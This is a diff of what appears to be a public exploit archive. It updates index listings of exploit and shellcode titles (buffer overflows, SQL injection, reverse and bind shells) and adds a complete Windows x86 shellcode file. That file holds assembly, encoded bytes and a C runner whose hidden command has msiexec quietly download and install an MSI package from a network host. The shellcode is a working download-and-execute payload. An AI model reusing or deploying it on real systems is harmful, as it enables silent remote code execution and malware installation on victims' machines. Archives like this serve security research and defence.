 46265,exploits/windows/local/46265.py,"R 3.4.4 XP SP3 - Buffer Overflow (Non SEH)",2019-01-28,"Dino Covotsos",local,windows,
 46267,exploits/windows/local/46267.py,"BEWARD Intercom 2.3.1 - Credentials Disclosure",2019-01-28,LiquidWorm,local,windows,
-46269,exploits/windows/local/46269.py,"Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)",2019-01-28,bzyo,local,windows,
-46279,exploits/windows/local/46279.py,"HTML5 Video Player 1.2.5 - Local Buffer Overflow - Non SEH",2019-01-29,"Dino Covotsos",local,windows,
+46269,exploits/windows/local/46269.py,"Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH) (DEP Bypass)",2019-01-28,bzyo,local,windows,
+46279,exploits/windows/local/46279.py,"HTML5 Video Player 1.2.5 - Local Buffer Overflow (Non SEH)",2019-01-29,"Dino Covotsos",local,windows,
+46283,exploits/windows/local/46283.py,"10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)",2019-01-30,bzyo,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40750,4 +40755,5 @@ id,file,description,date,author,type,platform,port
 46271,exploits/php/webapps/46271.txt,"Mess Management System 1.0 - SQL Injection",2019-01-28,"Ihsan Sencan",webapps,php,80
 46273,exploits/php/webapps/46273.txt,"MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting",2019-01-28,0xB9,webapps,php,80
 46274,exploits/php/webapps/46274.txt,"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection",2019-01-28,dd_,webapps,php,80
-46276,exploits/php/webapps/46276.txt,"PDF Signer 3.0 - SSTI to RCE via CSRF Cookie",2019-01-29,dd_,webapps,php,80
+46276,exploits/php/webapps/46276.txt,"PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)",2019-01-29,dd_,webapps,php,80
+46282,exploits/php/webapps/46282.txt,"Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection",2019-01-30,"Mehmet EMIROGLU",webapps,php,80

files_shellcodes.csv

@@ -935,5 +935,6 @@ id,file,description,date,author,type,platform
 46256,shellcodes/linux_x86/46256.c,"Linux/x86 - exit(0) Shellcode (5 bytes)",2019-01-28,"Daniele Votta",shellcode,linux_x86
 46257,shellcodes/linux_x86/46257.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (2)",2019-01-28,"Joao Batista",shellcode,linux_x86
 46258,shellcodes/arm/46258.s,"Linux/ARM - Reverse TCP (192.168.1.124:4321) Shell (/bin/sh) Shellcode (64 bytes)",2019-01-28,"Gokul Babu",shellcode,arm
+46281,shellcodes/windows_x86/46281.c,"Windows/x86 - 'msiexec.exe' Download and Execute Shellcode (95 bytes)",2019-01-30,"Kartik Durg",shellcode,windows_x86
 46264,shellcodes/arm/46264.s,"Linux/ARM -  Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes)",2019-01-28,"Gokul Babu",shellcode,arm
 46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",shellcode,linux_x86

shellcodes/windows_x86/46281.c

@@ -0,0 +1,56 @@
+# Title: Windows - Download and execute using msiexec.exe
+# Author: Kartik Durg
+# Shellcode Length: 95 BYTES
+# Write-up Link: https://iamroot.blog/2019/01/28/windows-shellcode-download-and-execute-payload-using-msiexec/
+# Tested on: WIN7x86
+
+---------------------------------------------------------------------------------------------------------------------------
+==> Assembly code:
+
+xor eax, eax                              ;Get the msvcrt.dll
+mov ax, 0x7472                        ;"tr\0\0"
+push eax
+push dword 0x6376736d         ;"cvsm"
+push esp
+
+; LoadLibrary
+mov ebx, 0x7717de85             ;Address of function LoadLibraryA (win7)
+call ebx
+mov ebp, eax                          ;msvcrt.dll is saved in ebp
+
+xor eax, eax                           ;zero out EAX
+PUSH eax                              ;NULL at the end of string
+PUSH 0x6e712f20                ;"nq/ "
+PUSH 0x69736d2e               ;"ism."
+PUSH 0x736d2f33                ;"sm/3"
+PUSH 0x2e312e38               ;".1.8"
+PUSH 0x36312e32               ;"61.2"
+PUSH 0x39312f2f                 ;"91//"
+PUSH 0x3a707474               ;":ptt"
+PUSH 0x6820692f                ;"h i/"
+PUSH 0x20636578               ;" cex"
+PUSH 0x6569736d               ;"eism"
+MOV EDI,ESP                      ;adding a pointer to the stack
+PUSH EDI
+MOV EAX,0x7587b177        ;calling the system()(win7)
+CALL EAX
+
+xor eax, eax
+push eax
+mov eax, 0x7718be52          ; ExitProcess
+call eax
+
+---------------------------------------------------------------------------------------------------------------------------
+
+==> Final shellcode:
+
+char code[] =
+"\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x85\xde\x17\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x20\x2f\x71\x6e\x68\x2e\x6d\x73\x69\x68\x33\x2f\x6d\x73\x68\x38\x2e\x31\x2e\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x2f\x69\x20\x68\x68\x78\x65\x63\x20\x68\x6d\x73\x69\x65\x89\xe7\x57\xb8\x77\xb1\x87\x75\xff\xd0\x31\xc0\x50\xb8\x52\xbe\x18\x77\xff\xd0";
+
+int main(int argc, char **argv)
+{
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+}
+---------------------------------------------------------------------------------------------------------------------------